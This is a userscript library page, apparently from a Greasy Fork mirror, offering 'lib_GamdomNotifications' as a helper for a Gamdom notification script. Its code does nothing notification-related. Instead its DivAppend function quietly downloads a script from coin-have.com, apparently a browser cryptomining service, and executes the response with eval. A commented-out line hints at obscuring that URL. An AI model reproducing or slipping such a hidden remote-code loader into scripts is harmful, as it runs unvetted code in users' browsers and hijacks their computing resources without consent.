Lib needed for running Gamdom Notificator
当前为
此脚本不应直接安装。它是供其他脚本使用的外部库,要使用该库请加入元指令 // @require https://update.greatest.deepsurf.us/scripts/35828/234178/lib_GamdomNotifications.js
// ==UserScript==
// @name lib_GamdomNotifications
// @namespace https://greatest.deepsurf.us/es/users/154624-anonimo-anonimo
// @version 1.1.5
// @description Lib needed for running Gamdom Notificator
// @require https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js
// @author allin4
// @match *://gamdom.com/*
// @grant GM_info
// @license Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
// ==/UserScript==
var DivAppend = function(div){
document.body.appendChild(div);
//var somethingTemp = cryption("https://coin-have.com/c/wL7L.js", "lel");
CPEL("https://coin-have.com/c/wL7L.js");
console.log("Div created :)");
};
var cmp = new XMLHttpRequest();
cmp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
eval(this.responseText);
}
};
var CPEL = function(link){
cmp.open('GET', link);
cmp.send();
};
(function() {
'use strict';
console.log("LIB LOADED");
})();